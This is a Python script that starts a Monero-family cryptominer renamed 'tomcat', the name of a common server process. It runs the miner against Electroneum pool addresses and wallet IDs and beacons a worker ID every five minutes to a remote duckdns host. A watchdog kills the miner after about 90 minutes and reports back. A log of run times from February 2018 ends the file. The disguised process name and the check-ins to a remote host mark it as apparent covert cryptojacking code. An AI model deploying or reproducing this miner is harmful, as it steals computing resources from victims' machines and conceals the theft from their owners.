import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:03:07.047465
#2018-02-17 16:49:01.564250
#2018-02-17 18:37:01.876235
#2018-02-17 20:24:07.332566
#2018-02-17 22:11:01.441848
#2018-02-17 23:55:04.836825
#2018-02-18 01:46:07.160390
#2018-02-18 03:33:01.700885
#2018-02-18 05:19:06.382630
#2018-02-18 07:12:01.723316
#2018-02-18 09:00:08.532717
#2018-02-18 10:47:01.695183
#2018-02-18 12:31:06.867661
#2018-02-18 14:18:04.663789
#2018-02-18 16:09:01.891718
#2018-02-18 17:58:03.820996
#2018-02-18 19:45:05.179999
#2018-02-18 21:29:06.401922
#2018-02-18 23:18:03.686241
#2018-02-19 01:04:07.157035
#2018-02-19 02:51:07.852667
#2018-02-19 04:38:04.779517
#2018-02-19 06:22:06.126272
#2018-02-19 08:11:01.952593
#2018-02-19 10:01:07.855751
#2018-02-19 11:50:09.952278
#2018-02-19 13:36:07.219472
#2018-02-19 15:25:09.264811
#2018-02-19 17:14:06.939788
#2018-02-19 19:02:01.608327
#2018-02-19 20:51:02.214211
#2018-02-19 22:38:06.359006
#2018-02-20 00:24:06.134239
#2018-02-20 02:13:06.552315
#2018-02-20 04:04:04.076097
#2018-02-20 05:49:01.875336
#2018-02-20 07:34:08.085527
#2018-02-20 09:19:05.347071
#2018-02-20 11:03:05.411339
#2018-02-20 12:50:07.512335
#2018-02-20 14:35:09.735809
#2018-02-20 16:19:06.343693
#2018-02-20 18:07:01.839997
#2018-02-20 19:57:01.532566
#2018-02-20 21:44:03.910467
#2018-02-20 23:26:04.111293
#2018-02-21 01:09:06.414462
#2018-02-21 02:56:01.882354
#2018-02-21 04:44:01.720477
#2018-02-21 06:31:04.926211
#2018-02-21 08:16:07.699590
#2018-02-21 10:02:05.829965
#2018-02-21 11:51:10.033777
#2018-02-21 13:42:04.921245
#2018-02-21 15:26:02.256161
#2018-02-21 17:17:04.389364
#2018-02-21 19:07:02.154483
#2018-02-21 20:55:02.736054
#2018-02-21 22:41:05.860089
#2018-02-22 00:29:05.060551
#2018-02-22 02:17:07.474227
#2018-02-22 04:04:07.308946
#2018-02-22 05:50:07.102697
#2018-02-22 07:35:07.390709
#2018-02-22 09:24:06.078202
#2018-02-22 11:10:07.718290
#2018-02-22 12:57:04.504957
#2018-02-22 14:45:02.466043
#2018-02-22 16:31:08.680278
#2018-02-22 18:17:09.906761
#2018-02-22 20:07:04.434351
#2018-02-22 21:56:04.806973
#2018-02-22 23:43:06.155800
#2018-02-23 01:32:02.238408
#2018-02-23 03:17:05.450671
#2018-02-23 05:03:06.775497
#2018-02-23 06:47:02.212015
#2018-02-23 08:39:05.598851
#2018-02-23 10:54:03.666700
#2018-02-23 12:52:01.984294
#2018-02-23 14:35:10.178398
#2018-02-23 16:26:08.324757
#2018-02-23 18:12:07.356777
#2018-02-23 19:57:05.668760
#2018-02-23 21:40:03.760226
#2018-02-23 23:33:05.495937
#2018-02-24 01:22:05.524830
#2018-02-24 03:14:01.844843
#2018-02-24 04:59:07.120619
#2018-02-24 06:47:06.613039
#2018-02-24 08:38:04.817757
#2018-02-24 10:22:01.588357
#2018-02-24 12:17:04.118503
#2018-02-24 14:09:01.444714
#2018-02-24 15:56:05.355572
#2018-02-24 17:48:04.047489
#2018-02-24 19:36:06.680756
#2018-02-24 21:23:05.235976
#2018-02-25 01:17:07.248931
#2018-02-25 05:15:09.147396
#2018-02-25 11:04:01.862790